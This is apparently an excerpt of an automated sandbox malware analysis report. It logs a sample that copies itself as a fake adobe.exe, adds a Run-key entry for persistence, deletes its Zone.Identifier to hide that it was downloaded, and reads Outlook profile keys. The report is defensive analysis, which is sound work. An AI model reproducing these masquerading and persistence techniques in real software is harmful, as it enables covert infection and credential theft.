Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: vaultcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: vaultcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: edputil.dll	Jump to behavior

Source: C:\Users\user\Desktop\ukBQ4ch2nE.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32

Jump to behavior

Source: C:\Users\user\Desktop\ukBQ4ch2nE.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Users\user\Desktop\ukBQ4ch2nE.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Outlook\Profiles

Jump to behavior

Source: ukBQ4ch2nE.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: ukBQ4ch2nE.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source: ukBQ4ch2nE.exe

Static PE information: 0x9E6E088B [Wed Mar 25 00:27:55 2054 UTC]

Source: C:\Users\user\Desktop\ukBQ4ch2nE.exe	Code function: 2_2_00B90C55 push edi; retf	2_2_00B90C7A
Source: C:\Users\user\Desktop\ukBQ4ch2nE.exe	Code function: 2_2_0663FBD1 push eax; ret	2_2_0663FBDD
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Code function: 5_2_013A0C55 push edi; retf	5_2_013A0C7A
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Code function: 5_2_013AEED0 pushad ; ret	5_2_013AEED1
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Code function: 5_2_06C68068 push esp; iretd	5_2_06C68071
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Code function: 8_2_029CEED0 pushad ; ret	8_2_029CEED1

Source: ukBQ4ch2nE.exe	Static PE information: section name: .text entropy: 6.960335286336614
Source: adobe.exe.2.dr	Static PE information: section name: .text entropy: 6.960335286336614

Persistence and Installation Behavior

Drops executable to a common third party application directory

Source: C:\Users\user\Desktop\ukBQ4ch2nE.exe

File written: C:\Users\user\AppData\Roaming\Adobe\adobe.exe

Jump to behavior

Source: C:\Users\user\Desktop\ukBQ4ch2nE.exe

File created: C:\Users\user\AppData\Roaming\Adobe\adobe.exe

Jump to dropped file

Source: C:\Users\user\Desktop\ukBQ4ch2nE.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run adobe			Jump to behavior
Source: C:\Users\user\Desktop\ukBQ4ch2nE.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run adobe			Jump to behavior

Hooking and other Techniques for Hiding and Protection

Hides that the sample has been downloaded from the Internet (zone.identifier)

Source: C:\Users\user\Desktop\ukBQ4ch2nE.exe

File opened: C:\Users\user\AppData\Roaming\adobe\adobe.exe:Zone.Identifier read attributes | delete

Jump to behavior

Source: C:\Users\user\Desktop\ukBQ4ch2nE.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate			Jump to behavior
Source: C:\Users\user\Desktop\ukBQ4ch2nE.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot			Jump to behavior

Source: C:\Users\user\Desktop\ukBQ4ch2nE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ukBQ4ch2nE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ukBQ4ch2nE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ukBQ4ch2nE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ukBQ4ch2nE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ukBQ4ch2nE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ukBQ4ch2nE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ukBQ4ch2nE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ukBQ4ch2nE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ukBQ4ch2nE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ukBQ4ch2nE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ukBQ4ch2nE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ukBQ4ch2nE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ukBQ4ch2nE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ukBQ4ch2nE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ukBQ4ch2nE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ukBQ4ch2nE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ukBQ4ch2nE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ukBQ4ch2nE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ukBQ4ch2nE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ukBQ4ch2nE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ukBQ4ch2nE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ukBQ4ch2nE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ukBQ4ch2nE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ukBQ4ch2nE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ukBQ4ch2nE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ukBQ4ch2nE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ukBQ4ch2nE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ukBQ4ch2nE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ukBQ4ch2nE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ukBQ4ch2nE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ukBQ4ch2nE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ukBQ4ch2nE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ukBQ4ch2nE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ukBQ4ch2nE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ukBQ4ch2nE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ukBQ4ch2nE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ukBQ4ch2nE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ukBQ4ch2nE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ukBQ4ch2nE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ukBQ4ch2nE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ukBQ4ch2nE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ukBQ4ch2nE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ukBQ4ch2nE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ukBQ4ch2nE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ukBQ4ch2nE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ukBQ4ch2nE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ukBQ4ch2nE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ukBQ4ch2nE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ukBQ4ch2nE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ukBQ4ch2nE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ukBQ4ch2nE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ukBQ4ch2nE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ukBQ4ch2nE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ukBQ4ch2nE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ukBQ4ch2nE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ukBQ4ch2nE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ukBQ4ch2nE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ukBQ4ch2nE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ukBQ4ch2nE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ukBQ4ch2nE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ukBQ4ch2nE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ukBQ4ch2nE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ukBQ4ch2nE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ukBQ4ch2nE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ukBQ4ch2nE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ukBQ4ch2nE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ukBQ4ch2nE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ukBQ4ch2nE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ukBQ4ch2nE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ukBQ4ch2nE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ukBQ4ch2nE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ukBQ4ch2nE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ukBQ4ch2nE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ukBQ4ch2nE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ukBQ4ch2nE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ukBQ4ch2nE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ukBQ4ch2nE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ukBQ4ch2nE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ukBQ4ch2nE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ukBQ4ch2nE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ukBQ4ch2nE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ukBQ4ch2nE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ukBQ4ch2nE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ukBQ4ch2nE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ukBQ4ch2nE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ukBQ4ch2nE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ukBQ4ch2nE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ukBQ4ch2nE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ukBQ4ch2nE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ukBQ4ch2nE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ukBQ4ch2nE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ukBQ4ch2nE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ukBQ4ch2nE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ukBQ4ch2nE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ukBQ4ch2nE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ukBQ4ch2nE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ukBQ4ch2nE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
